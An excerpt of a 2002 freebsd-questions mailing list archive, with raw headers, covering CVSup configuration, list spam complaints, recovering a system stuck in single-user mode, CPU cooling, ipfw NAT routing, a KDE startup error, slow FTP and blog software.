charset="iso-8859-1" From: Brett Rogers Reply-To: loki1012@cox.net To: freebsd-questions@freebsd.org Subject: Re: Re[2]: CVSup didn't update sources - why? Date: Tue, 25 Jun 2002 15:54:08 -0700 User-Agent: KMail/1.4.1 References: <10710529530.20020625124902@telecom.ural.ru> <20020625071636.1AE42204B5@yeoman.sinbad.net> <314341572.20020625135222@telecom.ural.ru> In-Reply-To: <314341572.20020625135222@telecom.ural.ru> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206251554.08500.loki1012@cox.net> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Maybe it's just me, but I dont see a version tag in your config file anywhere. What sources are you attempting to follow? For -STABLE, you should have a *default tag=RELENG_4 and for -CURRENT, it should be *default tag=. If you are following -STABLE, along with the above tag before src-all, you need a seperate one before ports-all *default tag=. On Tuesday 25 June 2002 12:52 am, Vladimir G. Drobyshevsky wrote: > Tuesday, June 25, 2002, 1:16:35 PM, you wrote: > > BR> On Monday 24 June 2002 10:49 pm, you wrote: > >> Hi! > >> There is a problem exist on my system. CVSup wont cvsuping :) my > >> local cvs-repository. > >> There is a linsting below: > >> > >> Premature EOF from server > >> Will retry at 12:24:49 > >> Retrying > >> ...and so on... > >> > >> That can it be? It works fine but after one moment it isn't. > > BR> Try changing your supfile to cvsup1.freebsd.org or cvsup3.freebsd.org, > if BR> that doesn't work post /etc/cvsupfile. It's impossible to tell what > the BR> problem is without looking at your configs. > It isn't depend on cvs-server, I tried some before. And I think what > my config cannot help, because it works before and it is edited version > of example ;) but I include it in attache. > > I run cvs throe socks5 by > runsocks /usr/local/bin/cvsup -g -L 2 -z /etc/cvs-supfile @M3novm > > Vl. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16: 0:45 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id A2F2F37B404 for ; Tue, 25 Jun 2002 16:00:39 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Tue, 25 Jun 2002 16:00:39 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Tue, 25 Jun 2002 16:00:39 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: I hate to bring it up again (spamming) Reply-To: pjklist@ekahuna.com In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020625230039020.AAA766@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > > As a side comment, even without Edwin, I've never been on a technical list > > that got so much spam. > > > > ------------------------------------------------------------------- > > DDDD David Kramer http://thekramers.net > > Well luser, newbie or just plain stupid, why don't the admins here block his > IP till he gets a clue? > > Just my .02 > > Beech I have emailed the freebsd postmaster/list administrator about this problem. The ball is in their court. As pointed out before, the problem is exacerbated by the unusual scenario of 1) not requiring membership to post and 2) not blocking file attachments by default. Phil -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16: 1: 6 2002 Delivered-To: freebsd-questions@freebsd.org Received: from email.telnor.net (email.telnor.net [200.23.249.11]) by hub.freebsd.org (Postfix) with ESMTP id 65D1437B405 for ; Tue, 25 Jun 2002 16:00:43 -0700 (PDT) Received: from kris.com (red-corb1-200383-116.telnor.net [200.38.3.116]) by email.telnor.net (Sun Internet Mail Server sims.4.0.2001.07.26.11.50.p9) with ESMTP id <0GYA00GIEAOUBD@email.telnor.net> for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 16:02:57 -0700 (PDT) Date: Tue, 25 Jun 2002 16:18:48 -0700 From: jehova Subject: Re: Should I expect this? In-reply-to: <021901c21c93$f03af0c0$c801a8c0@vsivyoung> To: Miroslav Pendev Cc: FreeBSD-Questions Message-id: <200206251618.48753.tornadox@telnor.net> MIME-version: 1.0 X-Mailer: KMail [version 1.4] Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT References: <021901c21c93$f03af0c0$c801a8c0@vsivyoung> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tuesday 25 June 2002 15:02, Miroslav Pendev wrote: > > -----Original Message----- > > From: Miroslav Pendev > > [mailto:shadow@CPE0004761ac738-CM00109515bc65.cpe.net.cable.ro > >gers.com] Sent: Tuesday, June 25, 2002 5:52 PM > > To: ro0t > > Cc: freebsd-questions > > Subject: Re: Should I expect this? > > > > > > Hello, list: > > > > > > > > Are these viruses just something I should expect from time > > > > to time? Of course, here at work, we have WinProxy, > > > > which, incidentally does a great job of detected and > > > > eliminating viruses before they get in, so it doen't > > > > really matter to me, but isn't there something that can be > > > > done before these posts make it out? > > > > > > > > > > > > Best Regards, > > > > > > > > Joshua Lokken > > > > OMIC Portland Branch > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-questions" in the body of the > > > > message > > > > > > > > > > > > I have contacted him about it. I am waiting for a reply. > > > > As far as > > > > > > stopping > > > > > > > spam and viruses this isnt my list. Youll have to ask > > > > whoever runs this > > > > > > list > > > > > > > to do a better job of doing that. *cough > > > > > > How about some mail rules into your favorite e-mail client > > > (Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)) > > > for 'moving' these into the right direction (folder)? > > > > > > Or how about some mail filtering or virus checking on your > > > mail server? I just did it and it works perfect! No > > > viruses... just your questions... > > > > ;-> > > > > > If you are good enough to use FreeBSD, I think, you must > > > know at lest 3 more ways to stop these for yourself. > > > > > > ""About 'this isnt my list': Welcome to the real world!"" > > > > > > ^ whats that supposed to mean? > > > > That is the way the things are. In the big mailists there is > > allways spam and viruses. Not because of you, not because the > > mai admin is not doing better job... just because this is the > > best way to send a message to a lot of people without the need > > to make your own mail server! > > > > > And you can look into headers and paste my version of > > > outlook? Are you trying to state a point in this email? > > > > Nope! Righ now I am using Microsoft Outlook Express, too. > > Just put some mail rules 'bout these emails and that's all... > > it is not a big deal. > > > > --Miro > > > > hehe i didnt even know it had that feature. thanks man. I > > thought you were flaming microsoft like these other guys. It > > seems if you own a windows box and freebsd your not good > > enough. well maybe if they would make freebsd a half decent > > desktop id be ok. > > I am using MS OE at my work. I am stuck with some M$ crap and I > need this cool gaming OS ;-) > > Otherwise, at home I have FreeBSD 4.6 mail server with > virus check of the incomming e-maisl and there is > not even one virus e-mail! > > I am using Mutt as mail client! 'All e-mail clients suck, Mutt > just sucks less than others...' > > --Miro > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message why this list begins to looks like the Linux user group mail list of my small town?....i say this because people that comes from microsoft (e.g myself)go to linux (sometimes) and do flames against 'microworst', "linux is diferent" and do all kind of gossips like small town when somebody pronounce 'MSWindows'. All this rumble here, complaints, opinions, off balance work and all this kind of sorts, and of !course! VIRUS is messing up this freebsd workgroup, don't you think on it? remember that anarchy and chaos that comes from a cracker is not only malicious code, this people everywhere they stands, put poison enthropy (disorder) and confusion, even without send any piece of code(!) this atacks are less visibles as a crack but are atacks too. don't lose control(!!!)kick this trash close postings to no suscribers and do better job on server for filtering content, why we NEED to recive dos/windows files if this is a unix user group list? if we let other people change OUR balance center they rules; Not us. why we do that other people wants, think on it...we are (or we want to become) smarter and not manipulated for a looser cracker without any focus on his life, we are technologist very different than a punk brained. too much junk and warnings about all this (more trash) is getting our mail boxes, we have more useful things to do than waste time with microsoft problems (bad design of this software[MS] leads to this atacks) -- _ __ ___ ____ ___ ___ ___ __ Jehova _ __ ___ | _ ) __| \/ \ tornadox@telnor.net _ __ | _ \._ \ |) | | FreeBSD!!! _ |___/___/___/ \/ () To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16: 9: 8 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 3136537B404 for ; Tue, 25 Jun 2002 16:08:40 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Tue, 25 Jun 2002 16:08:39 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Tue, 25 Jun 2002 16:08:39 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: questions-digest V5 #1423 Reply-To: pjklist@ekahuna.com In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020625230839622.AAA735@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Date: Tue, 25 Jun 2002 17:52:13 -0400 From: "Miroslav Pendev" > > ""About 'this isnt my list': Welcome to the real world!"" > > > > ^ whats that supposed to mean? > > That is the way the things are. In the big mailists there is > allways spam and viruses. Not because of you, not because the > mai admin is not doing better job... just because this is the > best way to send a message to a lot of people without the need to > make your own mail server! Actually not - as I and others have repeatedly pointed out, this seems to be one of the worst, if not *the* worst technical list we are members of in regards to spam and viruses lately. (I belong to many technical lists, several of which have similiar amounts of users, and they DO NOT get spam/viruses like this one does) -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16:12:16 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mta07-svc.ntlworld.com (mta07-svc.ntlworld.com [62.253.162.47]) by hub.freebsd.org (Postfix) with ESMTP id F0EE937B400 for ; Tue, 25 Jun 2002 16:12:08 -0700 (PDT) Received: from Administrator ([80.0.77.2]) by mta07-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP id <20020625231208.YJLA19225.mta07-svc.ntlworld.com@Administrator> for ; Wed, 26 Jun 2002 00:12:08 +0100 Message-ID: <003501c21c9e$310ad840$6400a8c0@Administrator> From: "Lee" To: Subject: Can only boot into single-user mode - Please Help Urgent Date: Wed, 26 Jun 2002 00:15:24 +0100 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0032_01C21CA6.91240140" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0032_01C21CA6.91240140 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello, Please help urgently. I was just editing the rc.conf file to add some new ethernet card = aliases but I missed out the file ' " ', now the system will only allow = me to boot into single-user mode. I know how to fix the problem, but as the / filesystem is mounted = read-only I cannot edit the rc.conf file. I have tried using the Install CD's fixit option but none of the options = work. Can anyone tell me. a) How to by pass the rc.conf file and just the rc.conf.defaults b) How to unmount the filesystem, so that I can remount it with right = access. thanks for any help any one can offer. I would also like to make a couple of comments / questions: Is it appropriate to have the / file system mounted read-only, as this = prevents as editing of the system files which are most likely to cause = boot problems? Also, IMHO, the Emergency Holographic shell is next to useless with this = particular problem as none of the basic commands I tried work (e.g. = mount, umount, ls, etc). Regards Lee ------=_NextPart_000_0032_01C21CA6.91240140 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hello,
 
Please help urgently.
 
I was just editing the rc.conf file to = add some new=20 ethernet card aliases but I missed out the file ' " ', now the system = will only=20 allow me to boot into single-user mode.
 
I know how to fix the problem, but as = the /=20 filesystem is mounted read-only I cannot edit the rc.conf = file.
 
I have tried using the Install CD's = fixit option=20 but none of the options work.
 
Can anyone tell me.
a) How to by pass the rc.conf file and = just the=20 rc.conf.defaults
b) How to unmount the filesystem, so = that I can=20 remount it with right access.
 
thanks for any help any one can = offer.
 
I would also like to make a couple of = comments /=20 questions:
 
Is it appropriate to have the / file = system mounted=20 read-only, as this prevents as editing of the system files which are = most likely=20 to cause boot problems?
 
Also, IMHO, the Emergency Holographic = shell is next=20 to useless with this particular problem as none of the basic commands I = tried=20 work (e.g. mount, umount, ls, etc).
 
Regards
 
Lee
------=_NextPart_000_0032_01C21CA6.91240140-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16:22:10 2002 Delivered-To: freebsd-questions@freebsd.org Received: from scaup.mail.pas.earthlink.net (scaup.mail.pas.earthlink.net [207.217.120.49]) by hub.freebsd.org (Postfix) with ESMTP id 9AD4537B403 for ; Tue, 25 Jun 2002 16:22:06 -0700 (PDT) Received: from dialup-63.214.201.90.dial1.philadelphia1.level3.net ([63.214.201.90] helo=sparky) by scaup.mail.pas.earthlink.net with smtp (Exim 3.33 #2) id 17MzdM-00052B-00; Tue, 25 Jun 2002 16:22:04 -0700 From: Jud To: Gautham Ganapathy , Scott Mitchell Cc: "FreeBSD.org - Questions" Date: Tue, 25 Jun 2002 19:22:28 -0400 X-Priority: 3 (Normal) In-Reply-To: <20020625204944.A381@fishballoon.dyndns.org> Message-Id: <62TRTPMILSNOIVQZZ879ZY3ZECX.3d18fb34@sparky> Subject: Re: [OFF] Pentium vs Athlon which is better MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Mailer: Opera 6.04 build 1133 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG 6/25/2002 3:49:44 PM, Scott Mitchell wrote: >On Tue, Jun 25, 2002 at 04:26:52PM +0530, Gautham Ganapathy wrote: >> On Tuesday, June 25, 2002 3:51 PM, Jud wrote: [snip] >> > The maximum temperature I see is around 55-56C. [GG] >> It used to be like that before I upgraded my motherboard. However, I did >> not change my processor. I think some of the glue b/w the cpu and >> heatsink may have come off. think that could be the reason ? [SM] >It's certainly possible... is this glue some kind of thermal pad that came >attached to the heatsink? You probably want to scrape that stuff off (may >need a bit of alcohol to dissolve it all, hopefully the heatsink isn't >glued permanently to the CPU), get some proper thermal compound >(any electronics store should stock this) and apply a *very* thin layer >between the heatsink and the CPU. > >There's plenty of how-to articles on the web that will walk you through the >whole process, such as: >http://www.arcticsilver.com/arctic_silver_instructions.htm > >Thermal goo is actually a worse conductor of heat than either the CPU core >or the heatsink, but better than air, so the trick is to apply just enough >to fill in all the microscopic gaps between the two parts, but no more. > >85C is really not a healthy temperature for a CPU... > > Scott (1) I doubt you could have separated the CPU and heatsink if "glue" (thermal epoxy) had been used, so I'm assuming as Scott does that it's the remains of a thermal pad. Alcohol is all you should use to get this off your CPU. If it doesn't all come off your heatsink with alcohol, you have 2 alternatives: (a) Very gently, with as flat an angle as possible to avoid any scratches, use a razor blade to remove the rest of the thermal pad. If the heatsink surface is fairly flat and shiny, use metal polish to buff it, then follow by cleaning with alcohol and a lint free cloth. If the surface is dull and/or scratched, use 2000 grit sandpaper or emery cloth, then follow with the metal polish and alcohol. Alternative (b) is to buy a new heatsink/fan. Surface preparation is the same. (2) Follow Scott's advice re application of thermal compound. (3) Not necessary to buy PC Power and Cooling fans - you have exhaust fans for the case and power supply, so all you need is an intake fan. You just want a case fan that is quiet and inexpensive (mine were $9 U.S.). (4) Palomino runs slightly cooler than the Thoroughbred, all else being equal. (5) Your ambient temperature (30-40C) is significantly higher than mine (20-25C), so you'll likely see higher final temps for your CPU. But at least you won't be dancing on the edge of system shutdown or CPU failure at 85 C. :) Jud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16:27: 9 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id 24D7437B401 for ; Tue, 25 Jun 2002 16:26:59 -0700 (PDT) Received: from daleco [12.145.236.48] by mail.gbronline.com (SMTPD32-7.10) id ABEA3510032; Tue, 25 Jun 2002 18:25:30 -0500 Message-ID: <02b001c21c9f$be06f520$30ec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Lee" Cc: References: <003501c21c9e$310ad840$6400a8c0@Administrator> Subject: Re: Can only boot into single-user mode - Please Help Urgent Date: Tue, 25 Jun 2002 18:26:32 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG 1. boot single user 2. run fsck-p. Since your shell rc files haven't been read (so path is not set) you may have to type /sbin/fsck -p This will also be the case with mount, etc. You can run them but you'll have to know where they are. Seems like mount in is /sbin, so (assuming ATA drives and standard disklabel...) /sbin/mount -t ufs /dev/ad0s1a / /sbin/mount -t ufs /dev/ad0s1e /usr /sbin/mount -t ufs /dev/ad0s1f /var You shouldn't need to 'unmount' just do the mount and / should go from read only to r/w. From: Lee To: freebsd-questions@FreeBSD.ORG Sent: Tuesday, June 25, 2002 6:15 PM Subject: Can only boot into single-user mode - Please Help Urgent Hello, Please help urgently. I was just editing the rc.conf file to add some new ethernet card aliases but I missed out the file ' " ', now the system will only allow me to boot into single-user mode. I know how to fix the problem, but as the / filesystem is mounted read-only I cannot edit the rc.conf file. I have tried using the Install CD's fixit option but none of the options work. Can anyone tell me. a) How to by pass the rc.conf file and just the rc.conf.defaults b) How to unmount the filesystem, so that I can remount it with right access. thanks for any help any one can offer. I would also like to make a couple of comments / questions: Is it appropriate to have the / file system mounted read-only, as this prevents as editing of the system files which are most likely to cause boot problems? Also, IMHO, the Emergency Holographic shell is next to useless with this particular problem as none of the basic commands I tried work (e.g. mount, umount, ls, etc). Regards Lee To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16:32:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from email.telnor.net (email.telnor.net [200.23.249.11]) by hub.freebsd.org (Postfix) with ESMTP id CCD9037B400 for ; Tue, 25 Jun 2002 16:32:28 -0700 (PDT) Received: from kris.com (red-corb1-200383-116.telnor.net [200.38.3.116]) by email.telnor.net (Sun Internet Mail Server sims.4.0.2001.07.26.11.50.p9) with ESMTP id <0GYA00HTYC6H19@email.telnor.net> for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 16:35:10 -0700 (PDT) Date: Tue, 25 Jun 2002 16:50:59 -0700 From: jehova Subject: !$%^%^?)(*&^%*&----> :+( In-reply-to: <021901c21c93$f03af0c0$c801a8c0@vsivyoung> To: FreeBSD-Questions Message-id: <200206251618.48753.tornadox@telnor.net> MIME-version: 1.0 X-Mailer: KMail [version 1.4] Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT References: <021901c21c93$f03af0c0$c801a8c0@vsivyoung> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG #####this is a copy of this replay from me: Re: Should I expect #####this? due some or most people in this list is trashing without opening (maybe) mails related with virus, spam, hate about listadmin and such, to avoid junk messages...i send this to freebsd list.what we need to do for stop this (on this list of course)? this list begins to looks like the Linux user group mail list of my small ....i say this because people that comes from microsoft (e.g myself)go to linux (sometimes) and do flames against 'microworst', "linux is diferent" and do all kind of gossips like small town when somebody pronounce 'MSWindows'. All this rumble here, complaints, opinions, off balance work and all this kind of sorts, and of !course! VIRUS is messing up this freebsd workgroup, don't you think on it? remember that anarchy and chaos that comes from a cracker is not only malicious code, this people everywhere they stands, put poison enthropy (disorder) and confusion, even without send any piece of code(!) this atacks are less visibles as a crack but are atacks too. don't lose control(!!!)kick this trash close postings to no suscribers and do better job on server for filtering content, why we NEED to recive dos/windows files if this is a unix user group list? if we let other people change OUR balance center they rules; Not us. why we do that other people wants, think on it...we are (or we want to become) smarter and not manipulated for a looser cracker without any focus on his life, we are technologist very different than a punk brained. too much junk and warnings about all this (more trash) is getting our mail boxes, we have more useful things to do than waste time with microsoft problems (bad design of this software[MS] leads to this atacks) -- _ __ ___ ____ ___ ___ ___ __ Jehova _ __ ___ | _ ) __| \/ \ tornadox@telnor.net _ __ | _ \._ \ |) | | FreeBSD!!! _ |___/___/___/ \/ () To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16:35:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from valis.olywa.net (valis.olywa.net [216.173.192.2]) by hub.freebsd.org (Postfix) with ESMTP id 95C3137B400; Tue, 25 Jun 2002 16:35:31 -0700 (PDT) Received: from intrepid.snowpoint.com ([216.173.213.173]) by valis.olywa.net (Post.Office MTA v3.5.3 release 223 ID# 0-56662U5000L500S0V35) with ESMTP id net; Tue, 25 Jun 2002 16:35:31 -0700 Received: from ([216.173.213.172]) by intrepid.snowpoint.com (Merak 4.10.020) with SMTP id HUB36795; Tue, 25 Jun 2002 16:30:49 -0700 From: "Corey Snow" To: freebsd-ipfw@freebsd.org, freebsd-questions@freebsd.org Date: Tue, 25 Jun 2002 16:35:40 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: ipfw, nat and routing Message-ID: <3D189BDC.28738.2074C888@localhost> X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi- I'm currently trying to set up a FreeBSD 4.5-RELEASE box as both a router and a NAT system. Basically, it has two NICs, and sits between my DMZ and my private LAN. The DMZ is connected to the Internet via a FreeBSD-based filtering bridge, which works fine. The DMZ is where I keep my routable IPs, for things like my webserver and mail system. On the backside of my NAT firewall, I use RFC1918 addresses. The outer interface of the NAT firewall has a routable address, obviously. I can get all this to work just fine. However, there's one more thing I'd like to add to this- the ability for the NAT firewall to also do simple routing between interfaces for my RFC1918 addresess. See, on my DMZ, in addition to my external IP addresses, I have used some RFC1918 addresses for various purposes, mostly for local administration. These RFC 1918 IPs are all in a single Class C. On the inside of the NAT firewall, I have another collection of RFC 1918 addresses, also in their own Class C. The internal interface of the NAT firewall has an address that is within that Class C, as does every other host on the network. The external interface of the NAT firewall has both a public IP and a private one. The private one is set as an alias. I'd like my firewall to route packets from my internal private Class C to my DMZ one, or if packets are destined for the Internet, to perform NAT and pump them out on the public IP. I can get this working one way, or the other, but not both at once. I'm still experimenting, but any suggestions would be helpful. Thanks a bunch. Regards, Corey Snow To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16:43: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from ebony.nbnet.nb.ca (smtp2.nbnet.nb.ca [198.164.30.5]) by hub.freebsd.org (Postfix) with ESMTP id 52A3637B400 for ; Tue, 25 Jun 2002 16:42:59 -0700 (PDT) Received: from tevor ([156.34.181.69]) by ebony.nbnet.nb.ca (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with SMTP id ca for ; Tue, 25 Jun 2002 20:42:56 -0300 From: "Trevor & Josie Stuart" To: Subject: FreeBSD 4.6 Date: Tue, 25 Jun 2002 20:42:51 -0300 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG HELP! :) I recently installed FreeBSD 4.6. Included with it is KDE 3.0. When I first install and bootup everything seems to go find, kde loads, works great, etc.. I pkg_add cvsup, and evolution. When I reboot everytime I try to startx I get a gray screen and an error pops up that says "Couldn't start ksmserver. Check your installation" Anyone have any ideas how I might be able to fix this?? Thanks for the help! :) TEv To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16:49:54 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.takas.lt (mail-src.takas.lt [212.59.31.78]) by hub.freebsd.org (Postfix) with ESMTP id C941B37B405 for ; Tue, 25 Jun 2002 16:49:47 -0700 (PDT) Received: from 127.0.0.1 ([213.190.51.152]) by mail.takas.lt with Microsoft SMTPSVC(5.0.2195.2966); Wed, 26 Jun 2002 01:49:38 +0200 Date: Wed, 26 Jun 2002 01:46:40 +0200 From: Mindaugas X-Mailer: The Bat! (v1.44) UNREG / CD5BF9353B3B7091 Reply-To: Mindaugas X-Priority: 3 (Normal) Message-ID: <458423822.20020626014640@delfi.lt> To: questions@FreeBSD.org Subject: question about FTP Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 25 Jun 2002 23:49:39.0310 (UTC) FILETIME=[F822B8E0:01C21CA2] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, I'am new in FreeBSD and other non win systems ao I have one stupid question. I make fresh FreeBSD 4.5 install and configured anonymous ftp service in /stand/sysinstall. Then I enabled ftpd daemon in inetd.conf and restarted my BSD box. All seems normal, anonFTP works, but it works very slow. My computer is connected: WinBOX<--->10MB hub<-->FreeBSDBox But the speed when I uploading to anon ftp is 60 - 90 kbps and when I downloading from my ftp speed is 1 - 15 kbps and it seems sometimes it hangs up. network cards are RTL8139 chips both (and winbox and BSDbox) At first I thought that my BSD box computer ($%&!(####@!!, but I installed Linux Slackware 8.0 and tryed ftp on it. i.e. LinuxBox<-->10MB hub<-->Winbox. The speed was 700 - 900 kbps (I think that is normal 10MB metwork speed) I tryed ftpd daemon, proftpd standalone,(on BSD) but speed is the same: 60 - 90 kbps. What I'm doing wrong??? may by my KERNEL need some options??? no firewall, no limitations is installed... the fresh install... plz help me... -- Sincerely Mindaugas mindugas77@delfi.lt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 16:53: 1 2002 Delivered-To: freebsd-questions@freebsd.org Received: from spitfire.velocet.net (spitfire.velocet.net [216.138.223.227]) by hub.freebsd.org (Postfix) with ESMTP id 5683E37B40A for ; Tue, 25 Jun 2002 16:52:46 -0700 (PDT) Received: from wenk (H204.C233.tor.velocet.net [216.138.233.204]) by spitfire.velocet.net (Postfix) with SMTP id E4C9EFB4515 for ; Tue, 25 Jun 2002 23:52:30 +0000 (GMT) Message-ID: <00ee01c21cbd$04cd5f40$b300a8c0@wenk> From: "Jeff Shevlen" To: Subject: blogs Date: Tue, 25 Jun 2002 19:55:40 -0700 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Does anyone have any experiences with blog software they can share? I've got a friend who wants to set up a blog in my humble domain. The thing is I'm very protective of said domain, and don't like the idea of running cgi and god knows what else, without vetting the whole thing. I've looked into the big two: http://www.movabletype.com http://www.noahgrey.com/greysoft/ .. plus all the ones on sourceforge. All comments are welcome, and in particular comments on security related issues would be great. Thnx Jeff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 17: 2: 1 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by hub.freebsd.org (Postfix) with ESMTP id 